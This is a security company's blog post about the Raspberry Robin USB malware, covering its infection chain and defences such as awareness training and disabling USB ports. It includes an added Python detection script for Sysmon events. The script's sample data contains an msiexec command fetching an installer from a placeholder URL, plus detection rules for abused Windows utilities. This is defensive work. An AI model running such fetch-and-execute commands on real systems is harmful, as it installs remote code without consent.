Beware Random Thumb Drives: Raspberry Robin Malware…


May 6, 2022

As if any well-minded cybersecurity professional would be trusting of the little buggers in the first place. Anywho, there’s a new malware making the rounds. It’s called Raspberry Robin and it lives almost exclusively on compromised USB drives.

The malware was first noticed in September of 2021 by the team over at Red Canary, a managed detection and response firm. According to researchers, the life cycle of Raspberry Robin is as follows:

  1. Infected USB drive attached – Raspberry Robin is typically introduced by infected removable drives – such as USB devices – containing a malicious .LNK file
  2. cmd.exe and msiexec.exe commands – cmd.exe reads and executes a malicious file stored on the infected device, then msiexec.exe attempts to connect to a short URL (often QNAP-associated)
  3. Malicious .DLL download – If the external msiexec.exe connection is successful, it downloads and installs a malicious .DLL
  4. rundll32.exe and Windows utility misuse – rundll32.exe launches a legitimate Windows utility like odbcconf.exe to execute the malicious .DLL
  5. Ongoing command & control activity – regsvr32.exe, rundll32.exe, and dllhost.exe repeatedly attempt outbound network connections, typically to TOR nodes

What does that mean?

So, basically, Raspberry Robin lives on external drives, like USB drives, memory cards, whatnot. When they’re plugged into a Windows machine, they begin a process of downloading a payload. After the payload is downloaded, the malware uses cmd.exe to execute it.

Raspberry Robin uses legitimate Windows utilities like fodhelper.exe, rundll32.exe chained to rundll32.exe, and odbcconf.exe to bypass User Account Control (UAC).

Nobody’s sure what Raspberry Robin actually does yet, however. Upon installation, the malware reaches out to various nodes associated with Tor. Red Canary has been unable to decipher what happens next, if anything.

“We also don’t know why Raspberry Robin installs a malicious DLL,” the researchers said. “One hypothesis is that it may be an attempt to establish persistence on an infected system.”
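To turn the chain above into something a SOC can act on, here is an added example (not from the post or from Red Canary) that checks Sysmon-style process-creation records for stage 2 (cmd.exe handing msiexec.exe a URL), stage 4 (rundll32.exe passing a DLL to another signed utility) and a fodhelper.exe child process; the field names follow Sysmon Event ID 1, and the sample events, URL and DLL path are constructed placeholders.

```python
"""Flag process-creation events that match the Raspberry Robin chain described above.

Events are modelled on Sysmon Event ID 1 fields (Image, ParentImage, CommandLine).
The sample events at the bottom are constructed for this example, not real telemetry."""
import re
from typing import Dict, List, Tuple

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


def _base(path: str) -> str:
    # Compare on the executable name only, case-insensitively (install paths vary per host)
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: Dict[str, str]) -> List[str]:
    """Return the stage labels an event matches (empty list = nothing suspicious)."""
    image, parent = _base(event["Image"]), _base(event["ParentImage"])
    cmd = event.get("CommandLine", "")
    hits: List[str] = []
    # Stage 2: cmd.exe launches msiexec.exe, which is given a URL rather than a local .msi
    if image == "msiexec.exe" and parent == "cmd.exe" and URL_RE.search(cmd):
        hits.append("stage2:msiexec_url_fetch")
    # Stage 4: rundll32.exe hands a DLL to another signed utility (e.g. odbcconf.exe)
    if parent == "rundll32.exe" and image in {"odbcconf.exe", "rundll32.exe"} and ".dll" in cmd.lower():
        hits.append("stage4:lolbin_dll_execution")
    # UAC bypass helper named in the write-up: fodhelper.exe normally spawns nothing else
    if parent == "fodhelper.exe" and image != "fodhelper.exe":
        hits.append("uac:fodhelper_child")
    return hits


def scan(events: List[Dict[str, str]]) -> List[Tuple[str, List[str]]]:
    """Run classify() over a batch and keep only the events that matched something."""
    findings = []
    for event in events:
        hits = classify(event)
        if hits:
            findings.append((_base(event["Image"]), hits))
    return findings


# Constructed sample telemetry (placeholder URL, DLL path and installer name)
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\msiexec.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"msiexec /q /i http://example.invalid/abc"},
    {"Image": r"C:\Windows\System32\odbcconf.exe", "ParentImage": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"odbcconf /A {REGSVR C:\Users\Public\payload.dll}"},
    {"Image": r"C:\Windows\System32\msiexec.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"msiexec /i C:\Installers\app.msi"},  # benign local install, must not fire
]

if __name__ == "__main__":
    for image, hits in scan(SAMPLE_EVENTS):
        print(image, hits)
```

Matching on the parent/child pair plus a URL or DLL in the command line keeps ordinary msiexec.exe installs from a local file out of the alert queue; the stage 5 network beacons would need Sysmon Event ID 3 data, which this block does not model.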

How can you protect yourself?

The two things that come to mind first are these:

  1. Security Awareness Training
  2. Disable USB access on endpoints

Why Security Awareness Training?

A healthy cybersecurity posture can only be formed on a strong foundation, made up of the combined efforts of a cyber security-minded workforce. If the workforce is aware of the threats posed by plugging in a seemingly random USB drive found on a sidewalk outside your place of business, malware like Raspberry Robin can’t take hold in the first place.

No matter what you do, no matter what cybersecurity implementation you put in place, you’ll only ever be as strong as your weakest link. By educating the masses (so to speak) you’re bolstering every other cybersecurity endeavor you’re putting in place to keep the business safe. You’re closing gaps rather than opening them.

You can learn more about Security Awareness Training here:

Why disable USB access on endpoints?

No matter what you do, there’s going to be one meathead in the organization who either forgets their security awareness training or didn’t care about security awareness training to begin with and likes to live life on the edge, plugging anything they find in immediately, just to see what’s on it.

If you disable USB access on your endpoints, no matter what the meathead does, they won’t be successful in their endeavor. In some cases, this might really be the only way to stop curiosity from killing that damn cat.

Carl Keyser is the Content Manager at Integris.
